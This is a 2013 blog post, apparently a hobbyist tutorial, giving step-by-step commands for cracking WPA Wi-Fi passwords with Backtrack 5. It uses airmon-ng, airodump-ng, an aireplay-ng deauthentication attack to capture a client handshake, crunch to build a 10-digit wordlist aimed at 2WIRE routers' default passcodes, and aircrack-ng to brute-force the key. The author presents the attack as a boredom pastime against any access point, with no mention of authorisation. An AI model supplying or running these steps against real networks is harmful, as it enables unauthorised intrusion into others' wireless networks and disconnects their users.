Wednesday, October 30, 2013

WPA Cracking with Backtrack 5

Well I decided to do a quick write up of WPA cracking with Backtrack 5. The other day I was bored so I decided fuck it, why not? So I figured hell I'll make a guide while I'm at it.
1.Load up Backtrack (I was using Backtrack 5 R2)
2.Open up terminal
Type in:

airmon-ng start {WIRELESSADAPTER}

What that will do is put your device in monitor mode on "mon0" (which will now become your new interface name)
3. In the terminal windows type in:

airodump-ng mon0

Now in order to get a handshake file (what we will be cracking) You need to have a client that is connected to the access point you want to attack. airodump will let you know this.
4. Copy down the AP Mac, the Client Mac, and the channel number
After you've copied that you can close the other windows.
5. In a new terminal windows type in:

airodump-ng -w {CAPFILENAME} --bssid {APMAC} -c {APCHANNEL} mon0

You can now use aireplay-ng to get the capture file, here's how we do it:

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0

After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake, now its time for the long part, cracking the handshake.
Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in backtrack (for that specific wordlist)

/pentest/passwords/crunch/./crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txt

After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor. for aircrack-ng run the following command:

aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txt

Just a quick run through.Its easy,but its the cracking that will take a while.Hope they have WPS, if they do, that becomes much easier ;) There are also several wordlists available.You can use whatever wordlist you want.Also as long as you have the capture file, you can crack it on any system.You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]
Enjoy WPA cracking!


Post a Comment


Subscribe in Bloglines Msn bot last visit powered by MyPagerank.Net Yahoo bot last visit powered by MyPagerank.Net
I heart FeedBurner downtime checker The Ubuntu Counter Project - user number # 31290

Twitter Delicious Facebook Digg Stumbleupon Favorites More

Powered by TadPole